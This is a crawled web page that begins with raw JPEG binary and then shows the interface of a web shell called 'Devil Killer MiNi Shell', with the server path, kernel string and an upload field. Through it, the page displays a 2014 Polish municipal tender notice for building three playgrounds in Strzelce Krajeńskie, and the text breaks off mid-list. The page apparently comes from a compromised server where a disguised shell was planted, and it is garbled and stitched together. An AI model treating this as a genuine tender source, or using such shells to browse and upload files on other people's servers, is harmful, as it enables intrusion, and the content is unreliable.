JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140404/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140404/73943-N-2014.html

<p class="kh_header"><b>Strzelce Krajeńskie: Budowa oraz remont placów zabaw w miejscowościach: Bronowice, Sokólsko, Bobrówko</b><br>
<b>Numer ogłoszenia: 73943 - 2014; data zamieszczenia: 04.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Strzelce Krajeńskie , Al. Wolności 48, 66-500 Strzelce Krajeńskie, woj. lubuskie, tel. 095 7631130 w. 235, faks 095 7633294.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.strzelce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa oraz remont placów zabaw w miejscowościach: Bronowice, Sokólsko, Bobrówko.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje: 

Budowę placu zabaw w Bronowicach - działka nr  24; 
 Zakres robót:
1. Prace ziemne;
2. Ogrodzenie;
3. Wyposażenie placu zabaw - montaż i dostawa urządzeń:
-  piaskownica z bali 3m x 3m - 1szt.
-  huśtawka podwójna - 1szt.
-  zawiesie z siedziskiem huśtawki - 2szt.
-  sprężynowiec konik - 2szt.
-  tablica informacyjna - 1szt.
-  ławka z bali - 3szt.
-  karuzela tarczowa - 1szt.
-  zjeżdżalnia -1szt.

Budowę placu zabaw w Sokólsku - działka nr 42/11;
         Zakres robót:
1. Prace ziemne;
2. Ogrodzenie;
3. Wyposażenie placu zabaw - montaż i dostawa urządzeń:
-  piaskownica z bali 3m x 3m - 1szt.
-  huśtawka podwójna - 2szt.
-  zawiesie z siedziskiem huśtawki - 4szt.
-  sprężynowiec konik - 3szt.
-  tablica informacyjna - 1szt.
-  ławka z bali - 3szt.
-  zjeżdżalnia -1szt.

Remont i doposażenie placu zabaw w Bobrówku  - działka nr 117/295;
         Zakres robót:
1. Prace ziemne;
2. Ogrodzenie;
3. Wyposażenie placu zabaw - montaż i dostawa urządzeń:
-  piaskownica z bali 3m x 3m - 1szt.
-  huśtawka podwójna - 1szt.
-  zawiesie z siedziskiem huśtawki - 2szt.
-  sprężynowiec konik - 1szt.
-  tablica informacyjna - 1szt.
-  ławka z bali - 3szt.
-  karuzela tarczowa - 1szt.
-  zestaw ze zjeżdżalnią - 1kpl. 

Wszelkie nazwy własne użyte w treści SIWZ i załącznikach należy czytać jako parametry techniczne i jakościowe materiałów oraz czytać je jako takie lub równoważne. Zgodnie z art. 30 ust. 4 zamawiający dopuszcza rozwiązania równoważne opisanym treścią siwz.  W myśl art. 30 ust. 5 Wykonawca, który powołuje się na rozwiązania równoważne, jest obowiązany wykazać, że oferowane przez niego roboty budowlane (w tym materiały                         i urządzenia) spełniają wymagania określone przez Zamawiającego w opisie przedmiotu zamówienia. Za równoważne Zamawiający uzna roboty budowlane (w tym materiały                          i urządzenia) o paramentach technicznych i jakościowych niegorszych niż określone w treści STWiOR oraz dokumentacji projektowej.

Szczegółowy zakres robót zawiera: Projekt Budowlany, Przedmiar Robót, Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych, zestawienie rzeczowo-ilościowe urządzeń zabawowych i towarzyszących, karty techniczne urządzeń. Dokumenty powyższe są załącznikami do niniejszej Specyfikacji Istotnych Warunków Zamówienia.

Roboty należy wykonać zgodnie z Projektem Budowlanym, Kartami technicznymi urządzeń, Specyfikacjami Technicznymi Wykonania i Odbioru Robót Budowlanych, Przedmiarem Robót. 

Materiały użyte do realizacji zadania muszą posiadać aprobaty techniczne, odpowiadać Polskim Normom przenoszącym europejskie normy zharmonizowane - art. 30 ust. 2 ustawy - Prawo zamówień publicznych - stosuje się odpowiednio oraz wymogom określonym                     w Specyfikacji Istotnych Warunków Zamówienia.

Wyceny robót należy dokonać wg załączonego przedmiaru robót .Wszystkie prace nie ujęte w przedmiarze, a niezbędne do wykonania zadania należy wykonać. Pożądane jest od wykonawców bardzo szczegółowe sprawdzenie w terenie warunków wykonania zamówienia. Wykonawca ma prawo do inspekcji i oceny terenu przyszłych robót i otoczenia przed złożeniem oferty.

W związku z zapewnieniem użytkownikom placów zabaw maksimum bezpieczeństwa wszystkie urządzenia wbudowane na placu zabaw wymagają posiadania certyfikatu bezpieczeństwa. Zamawiający szczegółowo opisał w Szczegółowych Specyfikacjach Technicznych Wykonania i Odbioru Robót dane techniczne wymagane. Zamawiający wskazał elementy poszczególnych urządzeń oraz ich wygląd, które będą bezwzględnie wymagane. Zamawiający wskazał w opisie technicznym oraz Szczegółowych Specyfikacjach Technicznych materiały z których mogą być wykonane elementy urządzeń i będzie bezwzględnie wymagał wykonania urządzeń z takich materiałów. 
Dostępność części zapasowych - place zabaw posiadają wiele elementów, które zużywają się wraz z upływem czasu wskutek naturalnej eksploatacji. Elementy te trzeba                      z czasem wymienić na nowe identyczne lub o identycznych właściwościach. Wykonawca powinien zapewnić dostęp do odpowiednich części zapasowych oraz w miarę potrzeby dokonać wymiany w okresie gwarancji i rękojmi.

Wykonawca zobowiązany będzie przy odbiorze końcowym do przedłożenia dla urządzeń zabawowych niżej wymienionych dokumentów:
-Certyfikaty i atesty na urządzenia zabawowe lub ich elementy - czyli dokumenty wystawione przez odpowiednie instytucje atestujące i certyfikujące zaświadczające                            o spełnieniu wymagań jakościowych oraz bezpieczeństwa. Urządzenia przeznaczone na place zabaw powinny posiadać certyfikaty zgodności z normą PN-EN 1176 2009r., natomiast nawierzchnia przeznaczona na plac zabaw podlega pod normę PN-EN 1177 2009r. Wykonawca  powinien dostarczyć certyfikat na całe urządzenie zabawowe. 
Jeśli urządzenie na plac zabaw nie posiada certyfikatu, gdyż nie jest to obowiązkowe wykonawca powinien zapewnić o zgodności wyrobu z normą.
-Dane techniczne urządzeń zabawowych przeznaczonych na plac zabaw - wykonawca powinien zapewnić dokładną specyfikację techniczną dla każdego z urządzenia.                                W specyfikacji powinny być zawarte takie informacje jak: materiały użyte do produkcji i budowy placu zabaw, wymiary urządzeń, elementy składowe urządzeń, sposób instalacji urządzeń, wymagania odnośnie nawierzchni, zabezpieczenia. Dodatkowo powinna być określona strefa funkcjonowania placu zabaw oraz krytyczna wysokość upadku z urządzeń.
-Instrukcja instalowania, demontażu urządzeń na placu zabaw - nawet w przypadkach, gdy Wykonawca instaluje urządzenia na placu zabaw ma obowiązek dostarczyć instrukcję instalowania tych urządzeń. W instrukcji powinna być określona przestrzeń montażowa oraz użytkowania urządzeń oraz szczegółowe wymagania dotyczące instalacji.
-Instrukcja użytkowania urządzeń na placu zabaw - Wykonawca powinien zapewnić instrukcję w jaki sposób prawidłowo użytkować urządzenia. Każde urządzenie znajdujące się na placu zabaw jest przeznaczone dla określonej liczby użytkowników w określonym wieku  i te informacje powinny się znaleźć w ww. instrukcji.
-Instrukcja kontroli i konserwacji urządzeń zabawowych na placu zabaw - Wykonawca powinien określić rodzaj przeprowadzania kontroli urządzeń zabawowych w celu zminimalizowania zagrożeń (jest to również określone w normie dotyczącej placów zabaw). Instrukcja dotycząca konserwacji ma na celu przedstawienie informacji jak odpowiednio zadbać o urządzenia zabawowe, ich stan techniczny, jak odpowiednio zabezpieczyć je przed korozją. Powinny być również zawarte informacje jak postępować z uszkodzonym placem zabaw. Wykonawca zobowiązany jest do założenia karty użytkowania  każdego urządzenia zabawowego.
Karty gwarancyjne na urządzenia zabawowe.

Do wykonania zamówienia Wykonawcy zobowiązani są użyć materiałów i urządzeń nowych, w gatunku I, gwarantujących najwyższą jakość, o parametrach technicznych                         i jakościowych nie gorszych niż określone  w specyfikacji technicznej, projekcie budowlanym i opisie technicznym. Występujące w opracowaniach nazwy, typy i pochodzenie produktów nie są dla Wykonawców wiążące. Podane w opisach nazwy własne nie mają na celu naruszenie art. 29 i 7 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz. U.  z 2013r., poz. 907, ze zm.), a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych i technologicznych Zamawiającego. Wykonawca może złożyć ofertę z rozwiązaniem równoważnym, która przedstawia przedmiot zamówienia                         o cechach odpowiadających cechom lub lepszych od cech wskazanych w opisie przedmiotu zamówienia, lecz oznaczonych innym znakiem towarowym np. wykonawca może zaoferować urządzenia o parametrach równych lub  lepszych niż wskazane przez zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.23-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości:  2.000,00 zł  (dwa tysiące złotych)
Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub  kilku następujących formach, w zależności od wyboru Wykonawcy:
a)	pieniądzu, przelewem na rachunek bankowy:
49 8362 0005 0399 1819 2000 0020 w  Banku: Lubusko - Wielkopolski Bank Spółdzielczy. 
b)	poręczeniach bankowych;
c)	poręczeniach pieniężnych spółdzielczych kas oszczędnościowo-kredytowych;
d)	gwarancjach bankowych;
e)	gwarancjach ubezpieczeniowych;
f)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. jedn. Dz. U. z 2007 r. Nr 42, poz. 275).
Wadium wnoszone w formie poręczeń lub gwarancji powinno być złożone w oryginale i musi obejmować cały okres związania ofertą. W przypadku wniesienia wadium w formie poręczeń lub gwarancji, koniecznym jest, aby gwarancja lub poręczenie obejmowały odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez wykonawcę, określone w art. 46 ust. 4a i 5 ustawy Pzp.
Wadium wniesione w pieniądzu przelewem na rachunek bankowy musi wpłynąć na wskazany w pkt 11.2.a) rachunek bankowy zamawiającego najpóźniej przed upływem terminu składania ofert.
Zamawiający dokona zwrotu wadium na zasadach określonych w art. 46 ust. 1-4 ustawy PZP.
Zgodnie z art. 46 ust. 4a i 5 ustawy Pzp Zamawiający zatrzyma wadium wraz z odsetkami, w przypadku gdy:
Wykonawca, którego oferta zostanie wybrana:
a)	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych  w ofercie;
b)	nie wniesie wymaganego zabezpieczenia należytego wykonania umowy;
c)	zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.
Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (wzór na  załączniku nr 7)
Ocena spełnienia warunków udziału w postępowaniu nastąpi metodą spełnia/ nie spełnia na dzień upływu terminu do składania ofert   na podstawie złożonych oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że wykonał w ciągu ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jednego zamówienia, którego przedmiotem była:
a) budowa jednego placu zabaw w zakresie instalowania urządzeń wyposażenia wraz                         z budową ogrodzenia z załączeniem dokumentów potwierdzających, że robota ta została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona.

Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić  zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia
Ocena spełnienia warunków udziału w postępowaniu nastąpi metodą spełnia/ nie spełnia na dzień upływu terminu do składania ofert   na podstawie złożonych oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (wzór na  załączniku nr 7)
Ocena spełnienia warunków udziału w postępowaniu nastąpi metodą spełnia/ nie spełnia na dzień upływu terminu do składania ofert   na podstawie złożonych oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje kierownikiem/kierownikami budów - osobami zdolnymi do wykonania zamówienia, tj. dysponowania minimum jedną osobą posiadającą uprawnienia niezbędne do kierowania robotami budowlanymi o specjalności konstrukcyjno-budowlanej zgodnie                                           z  Rozporządzeniem Ministra Transportu  i Budownictwa z dnia 28 kwietnia 2006r.                          w sprawie samodzielnych funkcji technicznych  w budownictwie lub odpowiadające im ważne uprawnienia budowlane w zakresie kierowania robotami budowlanymi wydane na podstawie wcześniej obowiązujących przepisów; z przynależnością do właściwej terytorialnie Izby Inżynierów Budownictwa. 
Wykonawca może polegać na potencjale technicznym, osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić  zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia
Ocena spełnienia warunków udziału w postępowaniu nastąpi metodą spełnia/ nie spełnia na dzień upływu terminu do składania ofert   na podstawie złożonych oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie niższą jak 100.000,00 zł (sto tysięcy złotych).
Wykonawca może polegać na zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić  zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia;
Ocena spełnienia warunków udziału w postępowaniu nastąpi metodą spełnia/ nie spełnia na dzień upływu terminu do składania ofert   na podstawie złożonych oświadczeń i dokumentów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty muszą być również dołączone następujące dokumenty: 
-wypełniony i podpisany Formularz ofertowy - zgodnie z zał. Nr 1 do SIWZ;
-pisemne zobowiązanie, o którym mowa w pkt 7 SIWZ, o ile Wykonawca polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp - jeśli dotyczy. Uwaga: Pisemne zobowiązanie powinno być złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę (jeśli posiada oryginał) lub podmiot trzeci;
-pełnomocnictwo - jeśli dotyczy;
-Tabela Elementów Ceny Ryczałtowej - załącznik nr 1A;
-Kosztorys ofertowy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Umowa zostanie zawarta według wzoru stanowiącego załącznik nr 8 do SIWZ.
2.	Umowa zostanie zawarta na podstawie złożonej oferty Wykonawcy.
3.	W przypadku, gdy Wykonawca będzie wykonywał przedmiot zamówienia przy pomocy Podwykonawców, to przed każdym rozliczeniem finansowym, Wykonawca przedstawi Zamawiającemu pisemne potwierdzenie otrzymania przez każdego z Podwykonawców całego należnego im z tytułu wykonania usługi wynagrodzenia lub potwierdzenie dokonania przelewu pełnej kwoty wynagrodzenia należnego Podwykonawcy.
4.	Suma kar umownych oraz odsetki za zwłokę w wykonaniu przedmiotu zamówienia zostanie potrącona Wykonawcy z faktury rozliczeniowej.
5.	Strony dopuszczają możliwość zmiany treści umowy w zakresie:
1)	terminu wykonania zamówienia w następujących przypadkach :
a.	w przypadku konieczności wprowadzenia zmian projektowych z powodu istotnych braków lub błędów w dokumentacji,
b.	z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron, ( np. ujawnienia w trakcie robót eksponatów archeologicznych i konieczności zlecenia wykonania ich inwentaryzacji stosownie do obowiązujących przepisów),
c.	wystąpienie siły wyższej uniemożliwiającej zrealizowanie inwestycji                         w terminie,
2)	wynagrodzenia w następujących przypadkach :
a)	w przypadku urzędowej zmiany podatków ponoszonych przez Wykonawcę (w szczególności podatku VAT),
b)	zmiany przedmiotu umowy o której mowa poniżej w pkt c),
c)	zmiany przedmiotu umowy w przypadku konieczności zrezygnowania przez Zamawiającego z części zakresu usług, np. z powodu błędu w dokumentacji lub z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są konieczne dla Zamawiającego.
6.	Zamawiający przewiduje możliwość zmiany umowy w przypadku gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała środki na sfinansowanie zamówienia.
7.	Zamawiający przewiduje możliwość zmiany umowy, w przypadku braku lub przerwania dofinansowania realizacji inwestycji z UE w ramach PROW.
8.	Ewentualne zmiany warunków umowy wymagają, dla ich ważności, zachowania formy pisemnej.
10.Zamawiający zastrzega sobie prawo rozwiązania umowy z winy Wykonawcy                         w przypadku:
a) jeżeli Wykonawca nie podjął się wykonania obowiązków wynikających z niniejszej umowy lub przerwał ich wykonanie,
